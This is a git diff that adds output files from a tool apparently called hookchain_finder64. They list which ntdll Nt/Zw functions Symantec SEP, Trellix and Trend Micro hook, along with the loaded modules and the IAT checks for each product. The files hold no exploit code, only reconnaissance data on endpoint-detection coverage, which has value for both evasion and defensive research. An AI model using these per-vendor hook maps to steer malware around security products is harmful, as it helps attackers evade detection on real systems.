+++ b/enum/results_enum/symantec_sep.txt
@@ -0,0 +1,30 @@
+[+] Listing ntdll Nt/Zw functions
+------------------------------------------
+NtQuerySystemTime is hooked
+Mapped 456 functions
+
+[+] Listing loaded modules
+------------------------------------------
+C:\Users\M4v3r1ck\Desktop\hook\hookchain_finder64.exe is loaded at 0x00007ff7b4960000.
+C:\Windows\SYSTEM32\ntdll.dll is loaded at 0x00007ffecb420000.
+C:\Windows\System32\KERNEL32.DLL is loaded at 0x00007ffecb020000.
+C:\Windows\System32\KERNELBASE.dll is loaded at 0x00007ffec87a0000.
+C:\Windows\system32\apphelp.dll is loaded at 0x00007ffec5dc0000.
+C:\Windows\System32\msvcrt.dll is loaded at 0x00007ffecac60000.
+
+[+] Listing hooked modules
+------------------------------------------
+Checking ntdll.dll at KERNEL32.DLL IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at KERNELBASE.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at apphelp.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at msvcrt.dll IAT
+ +-- 0 hooked functions.
+
+------------------------------------------
+Completed
\ No newline at end of file
diff --git a/enum/results_enum/trellix.txt b/enum/results_enum/trellix.txt
new file mode 100644
index 0000000..4564ef5
--- /dev/null
+++ b/enum/results_enum/trellix.txt
@@ -0,0 +1,109 @@
+[+] Listing ntdll Nt/Zw functions
+------------------------------------------
+NtAlertResumeThread is hooked
+NtCreateThreadEx is hooked
+NtDuplicateToken is hooked
+NtGetContextThread is hooked
+NtMapViewOfSection is hooked
+NtQuerySystemTime is hooked
+NtQueueApcThread is hooked
+NtResumeThread is hooked
+NtSetContextThread is hooked
+NtUnmapViewOfSection is hooked
+NtWriteVirtualMemory is hooked
+Mapped 478 functions
+
+[+] Listing loaded modules
+------------------------------------------
+C:\Users\M4v3r1ck\Desktop\hookchain_finder64.exe is loaded at 0x00007ff60b2d0000.
+C:\WINDOWS\SYSTEM32\ntdll.dll is loaded at 0x00007ffb23190000.
+C:\WINDOWS\System32\KERNEL32.DLL is loaded at 0x00007ffb211e0000.
+C:\WINDOWS\System32\KERNELBASE.dll is loaded at 0x00007ffb20cf0000.
+C:\WINDOWS\SYSTEM32\apphelp.dll is loaded at 0x00007ffb1e190000.
+C:\WINDOWS\System32\msvcrt.dll is loaded at 0x00007ffb21750000.
+C:\Program Files\Common Files\McAfee\SystemCore\mfehcinj.dll is loaded at 0x00007ffaeb7a0000.
+C:\WINDOWS\System32\RPCRT4.dll is loaded at 0x00007ffb22dc0000.
+C:\WINDOWS\System32\ADVAPI32.dll is loaded at 0x00007ffb21c00000.
+C:\WINDOWS\System32\sechost.dll is loaded at 0x00007ffb212a0000.
+C:\WINDOWS\System32\bcrypt.dll is loaded at 0x00007ffb21160000.
+C:\WINDOWS\System32\WINTRUST.dll is loaded at 0x00007ffb20ff0000.
+C:\WINDOWS\System32\CRYPT32.dll is loaded at 0x00007ffb20ad0000.
+C:\WINDOWS\System32\ucrtbase.dll is loaded at 0x00007ffb21060000.
+C:\WINDOWS\SYSTEM32\MSASN1.dll is loaded at 0x00007ffb20350000.
+C:\Program Files\Common Files\McAfee\SystemCore\mfehcthe.dll is loaded at 0x00007ffaeb920000.
+C:\Program Files\McAfee\MAR\mvcairo_x64.dll is loaded at 0x00007ffaeb8a0000.
+C:\WINDOWS\System32\USER32.dll is loaded at 0x00007ffb213a0000.
+C:\WINDOWS\System32\win32u.dll is loaded at 0x00007ffb20cc0000.
+C:\WINDOWS\System32\GDI32.dll is loaded at 0x00007ffb221c0000.
+C:\WINDOWS\System32\gdi32full.dll is loaded at 0x00007ffb209b0000.
+C:\WINDOWS\System32\msvcp_win.dll is loaded at 0x00007ffb20860000.
+C:\WINDOWS\System32\ole32.dll is loaded at 0x00007ffb215f0000.
+C:\WINDOWS\System32\combase.dll is loaded at 0x00007ffb21870000.
+C:\WINDOWS\System32\OLEAUT32.dll is loaded at 0x00007ffb21fc0000.
+C:\WINDOWS\System32\IMM32.DLL is loaded at 0x00007ffb21bd0000.
+C:\Program Files\McAfee\Endpoint Security\Adaptive Threat Protection\mfedeeprem64.dll is loaded at 0x00007ffb1e0b0000.
+
+[+] Listing hooked modules
+------------------------------------------
+Checking ntdll.dll at KERNEL32.DLL IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at KERNELBASE.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at apphelp.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at msvcrt.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at mfehcinj.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at RPCRT4.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at ADVAPI32.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at sechost.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at bcrypt.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at WINTRUST.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at CRYPT32.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at MSASN1.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at mfehcthe.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at USER32.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at GDI32.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at gdi32full.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at ole32.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at combase.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at OLEAUT32.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at IMM32.DLL IAT
+ +-- 0 hooked functions.
+
+------------------------------------------
+Completed
\ No newline at end of file
diff --git a/enum/results_enum/trend.txt b/enum/results_enum/trend.txt
new file mode 100644
index 0000000..165045d
--- /dev/null
+++ b/enum/results_enum/trend.txt
@@ -0,0 +1,69 @@
+[+] Listing ntdll Nt/Zw functions
+------------------------------------------
+NtCreateMutant is hooked
+NtCreateThread is hooked
+NtCreateThreadEx is hooked
+NtGetContextThread is hooked
+NtLoadDriver is hooked
+NtMapViewOfSection is hooked
+NtProtectVirtualMemory is hooked
+NtQueryInformationThread is hooked
+NtQuerySystemTime is hooked
+NtQueueApcThread is hooked
+NtReadVirtualMemory is hooked
+NtSetContextThread is hooked
+NtSetInformationThread is hooked
+NtTerminateProcess is hooked
+NtUnmapViewOfSection is hooked
+NtUnmapViewOfSectionEx is hooked
+NtWriteVirtualMemory is hooked
+Mapped 491 functions
+
+[+] Listing loaded modules
+------------------------------------------
+C:\Users\M4v3r1ck\Desktop\hookchain_finder64.exe is loaded at 0x00007ff649120000.
+C:\Windows\SYSTEM32\ntdll.dll is loaded at 0x00007ffb66ef0000.
+C:\Windows\System32\KERNEL32.DLL is loaded at 0x00007ffb65c20000.
+C:\Windows\System32\KERNELBASE.dll is loaded at 0x00007ffb64290000.
+C:\Windows\System32\msvcrt.dll is loaded at 0x00007ffb66bf0000.
+C:\Windows\system32\tmumh\20019\AddOn\8.55.0.1288\TmUmEvt64.dll is loaded at 0x00007ffb51ab0000.
+C:\Windows\System32\PSAPI.DLL is loaded at 0x00007ffb66ea0000.
+C:\Windows\System32\ADVAPI32.dll is loaded at 0x00007ffb66b20000.
+C:\Windows\System32\sechost.dll is loaded at 0x00007ffb64da0000.
+C:\Windows\System32\bcrypt.dll is loaded at 0x00007ffb64260000.
+C:\Windows\System32\RPCRT4.dll is loaded at 0x00007ffb65560000.
+C:\Windows\system32\tmumh\20019\TmMon\2.9.0.1084\tmmon64.dll is loaded at 0x0000000070ee0000.
+C:\Windows\System32\TmLWE\TmUmSnsr64\1.0.0.1127\TmUmSnsr64.dll is loaded at 0x00007ffb46f50000.
+C:\Windows\SYSTEM32\kernel.appcore.dll is loaded at 0x00007ffb63230000.
+
+[+] Listing hooked modules
+------------------------------------------
+Checking ntdll.dll at KERNEL32.DLL IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at KERNELBASE.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at msvcrt.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at PSAPI.DLL IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at ADVAPI32.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at sechost.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at bcrypt.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at RPCRT4.dll IAT
+ +-- 0 hooked functions.
+
+Checking ntdll.dll at kernel.appcore.dll IAT
+ +-- 0 hooked functions.
+
+------------------------------------------
+Completed
\ No newline at end of file